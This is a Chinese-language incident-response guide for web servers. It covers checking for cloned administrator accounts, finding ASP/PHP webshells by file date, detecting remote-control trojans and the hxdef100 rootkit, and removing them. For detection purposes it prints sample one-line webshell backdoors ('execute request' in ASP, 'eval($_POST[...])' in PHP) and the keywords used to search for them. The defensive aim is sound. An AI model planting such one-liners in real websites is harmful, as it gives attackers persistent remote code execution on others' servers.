一.分析黑客入侵与放后门过程
1.通过网站漏洞进入后提权然后克隆管理员账号
2.上传ASP或PHP木马并隐蔽深的目录
3.留后门
比如鸽子远程控制软件,radmin远控软件等
系统级后门黑客之门:hxdef100(黑客守卫者) Rootkit等
4.asp或php一句话后门.
二.账号安全性检查
1.查看有没有可疑用户登录:
方法一:在计算机管理里面查看用户,有没有新建立的.
方法二:进入C:\Documents and Settings目录,看看有没有可疑账户的文文件夹.
方法三:到事件查看器里的安全日志里查看成功登录的有没有可疑用户.
2.查看管理员用户有没有被克隆
特点注意被禁用的guest用户.
方法:到注册表里检测
HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\users
HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\
三.检查ASP木马和PHP木马
技巧:
1.在整个网站或论坛的文件夹上单击右键搜索
2.在全部或部分文件名里输入.php 或asp,在查找范围里选你的整个网站文件夹或整个论坛的文件夹.
提示:在全部或部分文件名里,也可以不输,这样就搜出任何文件,从这些文件中我们就可以看出是不是木马,后门之类的可疑程序..(这些程序不一定是php,asp,可能是exe等其它后缀名的后门程序)
3.然后点击---什么时候修改的?----指定日期---输入你的网站或论坛被入侵的日期.(修改文件的日期)----然后点击搜索.
提示:因为我们的网站程序和论坛程序.asp或.php文件非常多,不可能一个一个去查找是不是木马,所以非常巧的利用被修改的或被创建的指定日期来大大的缩小范围,这样就比较容易找出木马来.
_____________________________________________________________
一般入侵者上传木马时--------选创建日期
在正常程序中插入木马时------选修改日期
_____________________________________________________________
4.判断asp或php是不是木马的方法,有二种
1>.直接打开每个程序,看看里面的代码,有些是加密过的,所以一般很容易分辨出来.
2>.还有一种方法就是直接在浏览器里输入整个网址,看看这个文件会显示什么内容,是木马的话就直接显示一个登录密码的框,所以也一下子就知道是木马.
四.检查asp和php的一句话后门.
一般入侵者在得到一个网站的webshell后,为了以后再能进来,一般会在网页中插入一句话木马,方便以后进来,一句话木马隐蔽性非常强,在这么多文件中,我们根本不知道插在哪个文件里面,如果一个一个找,一个一个搜,是不太可能的.所以我们要掌握一定的技巧.
asp的一句话后门:
"〈%execute request("l")%〉"
PHP的一句话后门:
第一种:
EOT;
eval($a);
print <<<EOT
第二钟:
2.
a′]=′aa′;eval($_POST[′a′]);//
第三种:
3.
a′;eval($_POST[′a′]);//
运用的检查方法和检测asp或php木马一样,先在搜索指定日期被修改的或创建的文件,然后一个一个文件内容里搜索以下关键字:
asp一句话木马: 搜索关键字:〈%execute
PHP一句话木马:搜索关键字:eval
一般通过上面的方法很快就查出一句话后门搜在哪个页面里面.
五.检测服务器的木马与后门程序.
木马类:鸽子 radmin
后门类:hxdef100(黑客守卫者) Rootkit 内核级后门,隐蔽性强
一般黑客在得到系统权后,为了进一步控制系统一般会以下组合:
功能强大的远控软件 + 后门 + asp PHP 木马 + 一句话后门
-----------------------------------------------------
检测方法:
冰刃---可以查出常见的远程控制软件
被插入的进程以红色显示.
用冰刃结合可疑的服务,端口,进程和注册表项来综合检测.
rkdetector---可检测出hxdef100 ,Rootkit.
清除方法:
对于鸽子---金山出的鸽子专杀 +鸽子专杀(所用版本)
对于hxdef100
net stop HackerDefender100
搜索hxdef100.exe和hxdef100.ini;找到后删除就可以了.
以上就是查找和清除远控木马,后门程序,asp,php木马,与asp,php一句话后门的过程.
至于找出网站被入侵的原因,这就是看相关的日志,分析日志,还有木马清除后,服务器要做的安全配置工作,那是以后要讲的内容.
注:对于phpwind论坛还要检查的:
1.看看有没有被管理修改上传类型文件,比如改成了可以直接上传php
2.看看有没有在后台风格或其它地方插入了php一句话木马.
3.查看可疑的新建的管理员,等安全检测安全..